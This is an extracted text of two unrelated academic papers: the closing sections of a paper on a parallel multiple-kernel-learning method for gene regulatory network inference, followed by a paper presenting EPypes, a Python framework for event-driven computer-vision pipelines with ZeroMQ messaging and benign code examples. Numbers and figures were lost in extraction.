data. for irafnet , the expression data serves as the main data and the ppi data is used as support data. sampling weights are then derived from ppi data by building a diffusion kernel as k = eh where h is a graph laplacian for ppi data. sampling weights from k are derived as wppii, j = k(i, j) that is, the element k (i,j). the sampling weights thus obtained are then integrated with main data set (i.e., gene expression data). putative regulatory links are then predicted using importance scores generated using the irafnet r package. the auc and aupr scores obtained using irafnet and mkl-grni are listed in table . the auc and aupr scores of mkl-grni thus obtained are comparable to irafnet for both datasets. however, irafnet reports a lower auc and higher aupr scores compared to mkl-grni when run on e. coli data. but once we move towards a higher genome size, these scores start dropping marginally for both irafnet and mkl-grni approaches. the slight higher auc scores in case of mkl-grni can be attributed to some extent to the skewed class label distribution where in negative labels far outnumber the positive ones because of limited known regulations. this class imbalance leads to higher predictive accuracy (auc) but lower precision-recall scores (aupr). on the other hand regression based grn inference techniques have been reported to perform well for smaller genomes with genie (huynh-thu et al., ) being a start performer in dream network inference challenges. 
the higher aupr generated by irafnet in case of e. coli can be attributed to the way potential regulators are sampled using prior information from sampling weights (ppi), therefore decreasing false positives and increasing precision and recall. but for higher genomes (i.e, yeast in our case) the performance of both approaches begins to fall as reported by (mordelet & vert, ). present implementation of irafnet does not provide the ability to run the random forest algorithm in parallel. therefore, using irafnet for grni of higher genomes can incur huge computational cost by running thousands of decision trees in sequential mode. table auc and aupr scores for e. coli and s. cerevisiae using irafnet and mkl-grni. datasets irafnet mkl-grni auc aupr auc aupr e. coli . . . . s. cerevisiae . . . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since our main motive in this study is to parallelize the inference algorithm for large-scale grni, the higher speedup and higher quality provided by running mlk-grni in parallel can be used as a trade-off for slightly lower aupr compared to irafnet run in sequential mode with marginally higher aupr scores. discussion and conclusion here we present a scalable and parallel approach to grn inference using mkl as integration and supervised learning framework. the algorithm has been implemented in python using python interface to mkl provided by shogun machine learning toolbox (sonnenburg et al., ). the ability of kernel methods in pattern discovery and learning from genomic data fusion of multi-omics data using mkl has already been demonstrated in a number of inference studies. our focus here is to explore the scalability option for large-scale grn inference in a supervised machine learning setting, besides assessing the inference potential across different genomes. the approach undertaken can be considered as a parallel extension to sirene (mordelet & vert, ). although sirene performs better than other unsupervised and information theoretic based inference methods as reported by (mordelet & vert, ). however, it lacks the ability to learn from heterogeneous genomic datasets that can provide essential and complementary information for grn inference. another limitation is the sequential execution of the tf-specific classification problems that incur the huge cost in terms of execution times as we move from e. coli genomes to more complex and large genomes of mice and humans. therefore to facilitate very large scale grn inference using supervised learning approach, we use the concept of decomposing the initial problems of learning grn into many subproblems, where each subproblem is aimed to infer a grn for a specific tf. our algorithm distributes all such learning problems to different processors on a multi-processor hardware platform and dispatches them for simultaneous execution, thereby reducing the execution time of the inference process substantially. the results from each execution are written to a shared queue object, once all the child processes complete their execution, the queue object is iterated to build a single output matrix for genome-scale grn inference. we also assess the inference potential of our mkl based parallel grn inference approach by computing essential evaluation metrics for machine learning based approaches. 
a quick survey of scientific literature on grn inference methods will ensure that the results obtained by our approach are comparable to other state-of-the-art methods in this domain and some cases better than inference methods that employ only gene expression data (e.g., clr, aracne, sirene, etc. ). a drawback of our approach is that only tfs with known targets can be used to train the inference model. also, the performance of the algorithm tends to decrease if the model training is carried out using tfs with few known targets, leading to a bias in favor of tfs with many known neighbors (i.e., hubs) and is less likely to predict new associations for tfs with very few neighbors. besides, we are not able to identify new tfs among the newly learned interaction, nor the model can predict whether a given gene is upregulated or downregulated by a particular tf. wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore additional work is needed to improve the efficiency of the parallel algorithm and the inference potential of the mkl-grni. in our current implementation, we integrate only two datasets for grni, therefore leaving the scope to use more omics sources that can be integrated for improved performance of the inference model. also, the mkl framework provides a mechanism to weigh the contribution of individual datasets that can be used to select informative datasets for integration. further, we do not identify tfs from the predicted target genes and can be considered in future extension to this work. besides, novel techniques to choose negative examples for training our parallel mkl-grni model can be incorporated to decrease the number of false positives and improve the overall precision/recall scores for genomes of higher organisms. additional information and declarations funding nisar wani is supported by teacher fellowship of university grants commission, ministry of human resources development, govt. of india vide letter no. f.b no. -(tf- )/ under faculty development programme. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university grants commission, ministry of human resources development, govt. of india: f.b no. -(tf- )/ . competing interests the authors declare that they have no competing interests. author contributions � nisar wani conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � khalid raza conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available at github: https://github.com/waninisar/mkl-grni. references albert r. . network inference, analysis, and modeling in systems biology. plant cell ( ): – doi . /tpc. . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/waninisar/mkl-grni http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ alioscha-perez m, oveneke mc, sahli h. . 
epypes: a framework for building event-driven data processing pipelines

oleksandr semeniuta and petter falkman
department of manufacturing and civil engineering, ntnu norwegian university of science and technology, gjøvik, norway
department of electrical engineering, chalmers university of technology, gothenburg, sweden

abstract
many data processing systems are naturally modeled as pipelines, where data flows through a network of computational procedures. this representation is particularly suitable for computer vision algorithms, which in most cases possess complex logic and a large number of parameters to tune. in addition, online vision systems, such as those in the industrial automation context, have to communicate with other distributed nodes. when developing a vision system, one normally proceeds from ad hoc experimentation and prototyping to highly structured system integration. the early stages of this continuum are characterized by the challenges of developing a feasible algorithm, while the later ones deal with composing the vision function with other components in a networked environment. in between, one strives to manage the complexity of the developed system, as well as to preserve existing knowledge. to tackle these challenges, this paper presents epypes, an architecture and python-based software framework for developing vision algorithms in the form of computational graphs and for their integration with distributed systems based on publish-subscribe communication. epypes facilitates flexibility of algorithm prototyping and provides a structured approach to managing algorithm logic and exposing the developed pipelines as a part of online systems.

subjects computer vision, data science, robotics, software engineering
keywords computer vision, computational graph, publish-subscribe, robotics, python, pipeline, distributed systems, algorithm development, event-driven systems, concurrency

introduction
in recent years, the increased availability of computational resources, coupled with advances in machine learning methods and the ability to gather large amounts of data, has opened new possibilities for developing more advanced data-driven systems. visual data, acquired by various types of imaging equipment, constitutes one of the main inputs to advanced data analysis algorithms. in manufacturing automation, vision systems have a long history of use in combination with dedicated automated equipment and industrial robots, serving a role of contact-less sensing for, amongst others, quality inspection and robot guidance.
what differentiates industrial vision solutions from general-purpose computer vision systems is their coupling with the associated mechatronic components possessing an actuation function. this entails that most industrial vision systems operate in online mode, with their operation being synchronized with external systems by various forms of remote communication.

when a new robotic system with vision sensing is developed, early-stage system prototyping favors flexible tools and techniques that allow for iterating toward a functional solution quickly. when it comes to computer vision prototyping, the tools of the trade include opencv, as well as libraries from the python data science ecosystem, most notably numpy, scipy, pandas, scikit-learn, scikit-image, and others. vision algorithm development is a challenging task in itself, as it requires a great deal of experimentation and tuning of numerous parameters and thresholds. another challenge with early-stage prototyping of vision algorithms to be used with robotics and automation solutions is their coupling to other networked components. establishing communication interfaces can be time consuming, and is often done as a patchwork, which is difficult to maintain.

many data processing systems can be logically modeled as directed graphs in which data is gradually processed by the computational nodes. this is particularly characteristic of vision systems: after image capture and acquisition, an input image is obtained in memory and fed to a series of transformations leading to the application-specific output. such a pipeline can comprise the steps of image enhancement, image segmentation, and feature detection (fig. ). this idea has been formalized with the abstract concept of data flow, and has found its application in many areas, including distributed data processing, machine learning, embedded software development, and digital signal processing. matlab simulink and labview are the traditional engineering tools whose programming model is based on data flow. in data engineering and data science, tools like apache storm, apache airflow, luigi, and dask employ explicit data flow construction and execution. likewise, deep learning libraries such as tensorflow, caffe, and theano construct and train models as directed acyclic graphs (dags).

this paper tackles the problems of both (1) vision algorithm development and (2) its integration into distributed environments. this is done by introducing epypes, a python library for construction and execution of computational graphs, with the built-in capability of exposing the graphs as reactive pipelines. the latter are intended to be a part of publish-subscribe systems.
in addition to the software tools, this paper presents a system development method that facilitates the transition from an ad hoc prototyping phase to a well-structured system integration phase without compromising the developers' flexibility.

(figure: common steps of a vision pipeline, from image acquisition through image enhancement, image segmentation, and feature detection, producing features and other measurements for external systems.)

the epypes implementation is available under a bsd license at https://github.com/semeniuta/epypes.

the practical applicability of the proposed framework is validated in a distributed experimental setup comprised of a robot, an image acquisition service, and an image processing component, communicating in a publish-subscribe manner using zeromq middleware. it is shown that the epypes architecture facilitates seamless transition between various deployment configurations in a distributed computing environment.

this paper is structured as follows. first, the background areas are introduced, including an overview of computational systems based on dags, the python data science/computer vision ecosystem, and event-based middleware. further, the epypes abstractions are presented with code examples and architectural relationships. finally, a distributed system experiment based on epypes provides a more detailed view into the runtime properties of the framework.

background

graph-based representation of computational systems
a wide range of computational systems, particularly those with streaming behavior, can be represented as directed graphs, in which data is routed through processing nodes. not only is this representation accessible to human understanding (particularly for engineers), but it has also been used in various settings to improve the function of the systems. control engineering and signal processing have a long tradition of graphically modeling systems in the form of block diagrams. matlab simulink and labview are widely used in this context as engineering tools with formally defined abstractions. the field of cyber-physical systems (cps) makes great use of graph-based system models together with the associated models of computation (lee & seshia, ). a notable cps modeling environment is ptolemy ii. in computer science, graph-based representation of systems has been used for a range of different purposes: data flow models, task graphs (for parallel processing scheduling), symbolic representation of computational expressions (for machine learning and automatic computation of gradients), representation of concurrent process networks (e.g., communicating sequential processes), workflow languages, etc. in the software engineering community, the pipes and filters architecture applies the same ideas to data processing systems design and development. the well-known pipes mechanism of unix-like operating systems has proved to be particularly powerful when it comes to composition of multiple tools to solve a complex task. data science has seen a surge of tools based on explicit handling of data processing systems in a form of dag.
many of them are intended to be run on a computing cluster, and the dag architecture in this case facilitates scheduling of parallel execution of data processing tasks. apache storm is a cluster-based stream processing engine. apache airflow is a workflow management platform for batch processing on a cluster. dask is a python parallelization library that utilizes dag modeling for scaling algorithms written with numpy and pandas primitives to massive datasets.

python data science/computer vision ecosystem
the open source movement has gained considerable popularity within the fields of data science, computer vision, and robotics in recent years. even though established proprietary engineering tools are pervasive in the industrial context, they often lack flexibility and hinder a deeper understanding of how a system functions. conversely, open source tools provide community-contributed implementations of common functionality, which are flexible to use and allow for building more scalable and reproducible solutions. in computer vision, the opencv library has become a de-facto standard providing a pool of community-contributed image processing and computer vision algorithms. similarly, the point cloud library (pcl) provides open-source routines for point cloud processing. a multitude of tools from the python ecosystem are widely used for data science and scientific computing. they are built upon the numpy array library, and include pandas, scikit-learn, scikit-image, and many others. the abovementioned opencv and pcl, as well as many other low-level tools, expose python bindings, which makes it possible to perform rapid system development while preserving the high performance of the applied algorithms.

events and publish-subscribe middleware
an event-driven system is characterized by a discrete state space, where state transitions happen on the occurrence of events at sporadic time instants (cassandras & lafortune, ). in distributed systems, events are often embodied as messages sent over a network in a publish-subscribe communication system. such messages can signal a change of a system state (change event) or a notification from an observation (status event), expressed as a tuple with a timestamp and application-specific descriptive parameters (hinze, sachs & buchmann, ). message-based middleware provides a unified set of communication and input/output capabilities in such sense-respond systems. middleware makes it possible to decouple the communicating components by introducing message queuing, built-in address resolution (e.g., via handling logical addresses such as topic names), and usage of a common data serialization format (magnoni, ). the defining components of a particular middleware solution are the communication protocol (transport-level tcp and udp, wire-level amqp, zeromq/zmtp, mqtt), the communication styles (request/reply, publish/subscribe), and the data serialization method (typically realized with an interface definition language like protobuf or apache thrift). many middleware solutions are based on a central broker, for example, activemq and rabbitmq. the additional hop through the broker adds a constant value to the communication latency (dworak et al., ). zeromq is an example of broker-less middleware, in which the message queuing logic runs locally within each communicating component (zeromq, ).
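as a minimal illustration of the broker-less publish/subscribe pattern discussed above (this sketch is not taken from the paper; the endpoint and topic name are made up), the two sides of a pyzmq connection can look as follows, with each side normally living in its own process:

import time
import zmq

ctx = zmq.Context()

# publisher side: bind a pub socket
pub = ctx.socket(zmq.PUB)
pub.bind('tcp://*:5556')                      # illustrative endpoint

# subscriber side: connect and subscribe to a topic prefix
sub = ctx.socket(zmq.SUB)
sub.connect('tcp://localhost:5556')
sub.setsockopt_string(zmq.SUBSCRIBE, 'vision_request')

time.sleep(0.5)                               # give the subscription time to propagate
pub.send_string('vision_request trigger')     # topic prefix followed by payload
message = sub.recv_string()                   # blocks until a matching message arrives

no broker process is involved: the queuing logic is embedded in each endpoint, which is the property exploited by the experimental setup described later in the paper.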
epypes
epypes is a python-based software framework that combines the pipes-and-filters and publish-subscribe architectures. it allows developers to build data processing pipelines whose behavior is defined by their response to events. epypes defines a computational graph (a static data structure modeling a data processing algorithm), abstractions used for execution of computational graphs, and a hierarchy of pipelines, which extend the algorithm logic defined with computational graphs to be a part of a publish-subscribe system.

computational graph
at the core of epypes lies compgraph, a data structure that models a data processing algorithm as a computational graph, that is, as a network of functions and data tokens. formally, a compgraph can be described as a bipartite dag g = (f, t, e), where f is a set of functions, t is a set of data tokens, and e is a set of directed edges between functions and tokens and vice-versa. the latter implies that only edges of the following two kinds are permitted: (f, t_i), where f ∈ f and t_i ∈ t, and (t_j, g), where g ∈ f and t_j ∈ t. a function f ∈ f is associated with a python callable. a token t ∈ t represents a data object of an arbitrary type. if function f corresponds to a callable with m input parameters and n outputs, it has to be connected to m input tokens and n output tokens. let in_f ⊆ t denote the set of input tokens to f, and out_f ⊆ t denote the set of output tokens from f. functions in g are uniquely identified by their string-based names. this allows the same python callable to be used several times in the computational graph.

once a computational graph g is constructed and conforms to the requirement of acyclicity, its execution can be scheduled. a topological sort of g results in an order of vertices (functions and tokens) such that all the directed edges point from a vertex earlier in the order to a vertex later in the order. by invoking functions in this topological order, all the precedence constraints are satisfied.

for many computational procedures, one can typically distinguish between parameters carrying the primary data entities and parameters that tune the procedure. in this paper, the former are referred to as payload parameters and the latter as hyperparameters. thus, the tokens belonging to these two parameter sets of function f form the input parameter set of f: in_f = p_f ∪ h_f. it is further presumed that all hyperparameter tokens are frozen, that is, given fixed values, during the construction of graph g. the set of non-frozen source tokens is referred to as free source tokens, and is used to provide input to the computational graph.

in the computational graph example shown in fig. , rectangle vertices represent functions in the function set f, white circular vertices represent payload tokens, and gray circular vertices represent hyperparameter tokens. in accordance with the previously defined notation, the first function has two hyperparameter tokens, one payload token, and two output tokens; the second function has no hyperparameter tokens, one payload token, and one output token; and the third function has one hyperparameter token, two payload tokens, and one output token. the only free source token is the payload input of the first function, and its value is required to perform a computation.

the term hyperparameters is borrowed from machine learning, where it refers to parameters that characterize a particular algorithm, as opposed to model parameters. the semantics of hyperparameter tokens in this paper is similar, although the considered computational graphs can be used to model a wide variety of algorithms.
a concrete example
consider a simple computational graph that defines a processing chain in which a color image is first converted to grayscale, then blurred with a gaussian kernel, with the blurred image further used to perform edge detection with the canny algorithm. the following listing shows the steps of the computational graph construction:

import cv2

def grayscale(im):
    return cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)

def gaussian_blur(img, kernel_size):
    return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)

func_dict = {
    'grayscale': grayscale,
    'canny': cv2.Canny,
    'blur': gaussian_blur
}

func_io = {
    'grayscale': ('image', 'image_gray'),
    'blur': (('image_gray', 'blur_kernel'), 'image_blurred'),
    'canny': (('image_blurred', 'canny_lo', 'canny_hi'), 'edges'),
}

cg = compgraph(func_dict, func_io)

after importing the opencv python module (cv2), two helper functions are defined for grayscaling and blurring (the function for edge detection is used as-is). the structure of the computational graph is specified as two dictionaries. the func_dict dictionary defines a mapping from unique function identifiers (in this case, the strings 'grayscale', 'blur', and 'canny') to the respective callable objects. the func_io dictionary defines input/output relationships between the functions in the form of tokens. each function identifier is mapped to a tuple describing input and output tokens that can take one of the following forms, depending on the respective function's signature:

- (x, y) for single input and single output;
- ((x1, ..., xm), y) for multiple inputs and single output;
- (x, (y1, ..., yn)) for single input and multiple outputs;
- ((x1, ..., xm), (y1, ..., yn)) for multiple inputs and multiple outputs.

(figure: an example abstract computational graph.)

an instance of compgraph is then constructed based on func_dict and func_io. to be executable, a computational graph has to be supplied to the constructor of compgraphrunner. the latter is used to store the hyperparameter tokens and schedule execution of the graph with the topological sort. internally, compgraphrunner delegates storage and retrieval of token data to an instance of tokenmanager (fig. ). in the following example, the gaussian blur kernel and the low/high thresholds of the canny algorithm are specified in the dictionary hparams (the numeric values below are illustrative). the latter, together with the original computational graph cg, is used to construct a compgraphrunner:

hparams = {
    'blur_kernel': 11,   # illustrative value
    'canny_lo': 70,      # illustrative value
    'canny_hi': 200      # illustrative value
}
runner = compgraphrunner(cg, hparams)

visualization of this parametrized computational graph is shown in fig. , where the hyperparameter tokens are highlighted in gray. to run a compgraphrunner, its run method is invoked with keyword arguments corresponding to names and values of free source tokens. in this example the only free source token is image; therefore, the running syntax is the following:

im = cv2.imread('image.jpg', cv2.IMREAD_COLOR)
runner.run(image=im)

a compgraphrunner can be used as a namespace for accessing any token value by the token key. the interface for this operation is the same as for a python dictionary.
an instance of sourcepipeline is constructed as follows: src_pipe = sourcepipeline(‘mysourcepipeline’, cg, q_out, f_out, hparams) node pipeline sourcepipeline sinkpipeline fullpipeline eventloop compgraphrunnernodebasedcompgraph compgraph figure class digram of epypes pipelinespipelines. full-size doi: . /peerj-cs. /fig- compgraphrunner f f t t t f t t t t t �in tokenmanager figure structure of an instance of pipelinepipeline. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as an example of the output preparation function, consider a pipeline, whose computational graph contains a token with the key pose, corresponding to a d pose estimated from images. to take the data corresponding to this token and package it as a python pickle, the following function can be defined: defdef prepare_output(pipe): pose = pipe[‘pose’] wire_data = pickle.dumps(pose) returnreturn wire_data another subclass of pipeline is sinkpipeline, shown in fig. . it is meant not to be called manually, but to be triggered as an event e is announced in qin. because e can be an arbitrary object, it is necessary to map its contents to a dictionary de that describes what data should correspond to the pipeline’s free source tokens. such mapping is defined by event dispatcher function fin. an instance of sinkpipeline is constructed in a familiar way: snk_pipe = sinkpipeline(‘mysinkpipeline’, cg, q_in, f_in, hparams) the idea of event dispatcher can be illustrated by referring to the computational graph in the earlier example (fig. ). consider that e constitutes an image as a numpy.ndarray. because a compgraphrunner is invoked with keyword arguments, fin is defined to map to the required kwargs dictionary: defdef dispatch_image(im): returnreturn {‘image’: im} producer queue consumer get event get put figure sequence diagram of thread-based producer and consumer interacting through a queue. full-size doi: . /peerj-cs. /fig- qout put in compgraphrunner tokenmanager �out f f t t t f t t t t t figure structure of an instance of sourcepipelinesourcepipeline. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the behavior of waiting for an event is realized with an event loop, an instance of eventloop class, which is continuously run in a separate thread of execution. it monitors qin, and, as a new event e becomes available, invokes the associated instance of sinkpipeline (fig. ) having the kwargs from the event dispatcher: input_kwargs = self._event_dispatcher(event) self._callback_pipeline.run(��input_kwargs) finally, the most comprehensive epypes entity is fullpipeline, shown in fig. . it subclasses pipeline, and provides functionality of both reacting to a stream of incoming events in qin and publishing a subset of its processing results to qout as outgoing events. 
it is instantiated in the following way: snk_pipe = fullpipeline(‘myfullpipeline’, cg, q_in, q_out, f_in, f_out, hparams) epypes-based system development a distinction between a static computational graph and its runtime counterparts is realized in order to facilitate smooth system evolution from an early ad hoc development phase to a more integral whole with well-functioning reactive behavior. as shown in fig. , the development starts with components having less structure, and proceeds by extension of these components with functionality and behavior that are facilitated by the proposed tools. in the early development phase, vision algorithms, as well as other data processing routines, are prototyped using the available tool set: different alternatives can be implemented and evaluated in an interactive manner using tools like jupyter and supported by opencv and a pool of scientific python libraries (numpy, pandas, scikit-image, scikit-learn). as the result of prototyping, a collection of well-tested functions is developed. at this stage, the developer can specify computational graphs from the pool of these functions. qin get� compgraphrunner � el tokenmanager�in f f t t t f t t t t t figure structure of an instance of sinkpipelinesinkpipeline.. full-size doi: . /peerj-cs. /fig- qout put �out qin get� compgraphrunner � el tokenmanager�in f f t t t f t t t t t figure structure of an instance of fullpipelinefullpipeline.. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the process of computational graph engineering involves a great deal of prototyping itself. despite the fact that compgraph constitutes a highly-structured entity, the flexibility of its definition brings a number of advantages over coding up the algorithm as a single function. most importantly, the flat structure of the computational graph, along with graphviz-based visualization capabilities, gives a transparent view on the data flow in the developed algorithm. it also allows for incorporating several alternative branches as a part of the same graph. the uniquely-named tokens provide an isolated namespace, which is specifically useful when prototyping in a jupyter notebook. the mechanism of hyperparameter tokens allows for systematic management of the set of thresholds and other configuration values while being on a single hierarchical level (without a cascade of function calls). the well-defined structure of a computational graph facilitates automated manipulation of it, for example, extending the original graph with additional functions, union of two or more graphs, and union with renaming of functions and tokens. when a computational graph is developed, it can be used to construct pipelines. the non-reactive pipeline provides additional capabilities to the computational graph: it is runnable, includes time measurement functionality, and can be flexibly subclassed, as done in reactive pipelines (sinkpipeline, sourcepipeline, and fullpipeline). the latter are used to expose the developed algorithm in online mode. epypes use case in order to illustrate practical application of the epypes framework and show its suitability for building data processing components in distributed environments, this section presents a run time use case scenario with the associated experiment. 
the presented scenario demonstrates how epypes can be deployed as a part of a real distributed system (with the communication based on zeromq and protobuf) and what timing properties may be expected in this case. in particular, a major concern is how much overhead is introduced by the additional abstractions in the epypes architecture. furthermore, it is of interest how repeatable this overhead is, as well as what role it plays comparing to communication latency and the application-specific processing time. rough prototyping (jupyter notebooks, simple scripts etc.) tested and documented procedures (python functions and classes) computational graphs (compgraph, compgraphrunner, tokenmanager) non-reactive components (node, pipeline) reactive components (sourcepipeline, sinkpipeline, fullpipeline) customized components (custom nodes, pipelines, middleware adapters) t o w a rd s m o re s tr u ct u re a n d r e a ct iv ity figure layered system development framework. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ system description as shown in fig. , the case system is comprised of three nodes: ( ) the robot control node, ( ) the image acquisition service, and ( ) the epypes-based image processing node. the robot control node coordinates the robot’s work cycle and realizes communication with external systems. the system performing stereo acquisition from two cameras is designed as a streaming service, built using the fxis framework (semeniuta & falkman, ). for each associated camera, a stream of images is captured in its own thread of execution, and a number of recent frames are retained at each moment. external systems can request images from the service that closely correspond to the request timestamp. the nodes run in the distributed environment and communicate through zeromq publish/subscribe sockets and in-process blocking queues. for publishing and subscribing, epypes provides two thread-based abstractions, namely zmqpublisher and zmqsubscriber. the former encapsulates a zeromq pub socket and acts as a consumer of an in-process queue: as a new data is available on the queue, it gets published. an example in fig. is the pub /qout pair. zmqsubscriber encapsulates a zeromq sub socket, which is polled with the poller object. on arrival of a new message, the latter is put on the connected in-process queue. an example in fig. is the sub /qin pair the robot control node runs on an arm-based raspberry pi single-board computer with the raspbian operating system, while the vision-related components are deployed to an ubuntu-based x - machine. the latter has an ethernet connection to a stereo camera pair (gige vision-based prosilica gc ), which are used by the image acquisition node. the following communication loop is considered: . robot announces request for timely image processing results; the image request is announced asynchronously as an event at pub . . images most closely associated with the request are acquired and, as a tuple of numpy. ndarray, communicated to the processing component via the common in-process queue qimages. . image processing node extracts the desired features from the images, which are communicated back to the robot via the pub /sub asynchronous socket pair. robot control node pub sub pub sub image acquisi�on service qin …qimages qout figure system configuration. full-size doi: . /peerj-cs. 
/fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the target vision algorithm performs orb feature detection, description, and matching (rublee & bradski, ). figure shows the corresponding computational graph. after image features are identified in each image, collections of feature descriptors are matched against each other using opencv’s bfmatcher object, with the matches returned in sorted order by match distance. the final gather_keypoints function produces an array of the matched keypoints’ coordinates. the communicated messages that are send over wire are serialized in the google’s protocol buffers (protobuf) interchange format. three message types are used: � attributelist represents a collection of key/value attributes, where an attribute can be either a string, a double, or an int . � event, sent over pub /sub , is comprised of an id (string), a type (string), and attributes (attributelist); � justbytes, sent over pub /sub , is comprised of an id (string), content (bytes), and attributes (attributelist); the computational graph shown in fig. forms a basis for an instance of a fullpipeline. its event dispatcher fin handles tuples with pairs of images put onto qimages. the output preparation function fout is responsible for packaging the output data as a justbytes protobuf message, with its content being the pickle-serialized value of the first rows of the keypoints_paired token (numpy.ndarray), and the attributes filled by timestamps and durations captured with the image acquisition service and the epypes pipeline. time measurement experiment the robot control node announces a series of vision requests and extracts attributes from the response protobuf messages. in addition, it records the timestamps of when the vision request get announced (tvreq) and when the corresponding response is obtained (tvresp). detect_and_describe_features_ keypoints_ descriptors_ gather_keypoints match keypoints_paired matches detect_and_describe_features_ keypoints_ descriptors_ mask_ wta_kfastthreshold nfeatures edgethreshold crosscheck image_ nlevels image_ scalefactor mask_ scoretype normtype patchsize figure orb computational graph. full-size doi: . /peerj-cs. /fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the difference between these timestamps accounts for the trip duration of the current request: ttrip ¼ tvresp � tvreq for execution of both the image acquisition service and the vision pipeline, two timestamps are added to the properties set: treact, when the component reacted to the incoming event, and tpub, right before publishing the outgoing event. 
their difference tr!p provides the measurement of the component’s processing time, including processing of incoming and outgoing events: tr!p ¼ tpub � treact properties related to the vision pipeline that get added to the outgoing protobuf message comprise vision processing time sp, overhead from orchestrating the computational graph ocg, and timestamps of start and finish of the event dispatcher fin tfin"; tfin# � � and the output preparation function fout tfout"; tfout# � � , which define the corresponding function durations: sfin ¼ tfin# � tfin" sfout ¼ tfout# � tfout" computational graph overhead ocg is measured internally by the pipeline (p.compute_overhead()), and constitutes the difference between total processing time of the pipeline and the sum of processing times of all the enclosed nodes: ocg ¼ sp � � x fsn for each node n pg after each request is finished, the robot control node records all the obtained properties. the latter are further aggregated in a pandas data frame, with a row of properties’ values per each request. from the available data, the following overhead metrics can be computed: . network overhead measures how much the trip duration is greater than the time spent in all the components: onetwork ¼ strip � ðtðimage acquistitionÞr!p þ tðvision pipelineÞr!p Þ . epypes overhead is computed as an excess time in the vision pipeline in addition to the processing in the computational graph and in the functions fin and fout: oepypes ¼ sðvision pipelineÞr!p � ðsp þ sfin þ sfoutÞ figure demonstrates the timeline of vision requests and the associated durations of the image acquisition service, the vision pipeline, and the overhead from network communication. data has been collected from five experiments, each with vision requests. for each experiment, a maximum likelihood estimation of log-normal probability density function is performed for distributions of ocg and oepypes. the same estimation is performed for all data combined. figures and show visualization of these pdfs. a pdf for each individual experiment is visualized as a shaded area under the curve. the pdf for all data is shown as a thick curve. the thin vertical line specify the semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ modal value of the pdf for the combined dataset, and the enclosing thick vertical lines delimit the overall range of measurements for the combined dataset. it can be seen from fig. that overhead from performing data processing based on a computational graph ocg is characterized by matching log-normal distributions for every experiment, with most of the probability density located around . ms. the epypes overhead oepypes, as shown in fig. , has much tighter range of possible values, distributed log-normally with matching distributions for every experiment, and with most of the probability density around . ms. overall, for a vision algorithm that naturally requires tens of milliseconds to perform the processing, the overheads introduces by epypes can be considered negligible. related work the idea of explicit utilization graph-based representation of data processing algorithms has been on the surface for many years. the availability of engineering tools, data science figure components’ durations and network overhead for a series of vision requests. full-size doi: . /peerj-cs. /fig- figure computational graph overhead. full-size doi: . /peerj-cs. /fig- figure epypes overhead. full-size doi: . /peerj-cs. 
/fig- semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ frameworks, and modeling formalisms, described in the background section, shows the efficacy of the pipeline thinking when designing systems with streaming logic. the distinctive approach of epypes lies in its tight integration with the python ecosystem, support for algorithm prototyping, and abstractions for integration of the developed computational graphs into distributed systems. the epypes architecture is a logical continuation of the concept of discrete event data flow, earlier presented by semeniuta & falkman ( ). this earlier work attempted to define a data flow formalism with distinct notion of event as the one used in publish/subscribe systems. however, the presented formalism didn’t include a reference implementation at the time. epypes has, in turn, refined the notion of reactive pipelines and made it usable in real scenarios. other highly related work within the formal methods domain is stream algebra (helala, pu & qureshi, ), with its go-based implementation (helala, pu & qureshi, ). this approach models an image processing algorithm as a set of data streams that get altered by a set of operators. in the algebra implementation, a stream corresponds to a go channel, and the set of defined operators allow to define usable workflow patterns such as pipeline graphs, fork-join graphs, and pipeline graphs with feedback. the latter option is naturally supported due to the concurrency features of go. this approach, similarly to epypes, allows to construct high level algorithm from finer functions, including those from the opencv library. the distinctive feature is the support for feedback, which is disallowed in epypes due to the acyclicity requirement. the feedback with epypes, however, can be realized on a higher systemic level, by incorporating additional distributed components. in the contemporary robotics research, the robot operating system (ros) is widely used as the underlying platform for the distributed robotic applications relying on data from sensors and cameras. the general architecture in this case is based on a collection of nodes that react to arrival of data through publish/subscribe topics, which makes the overall logic 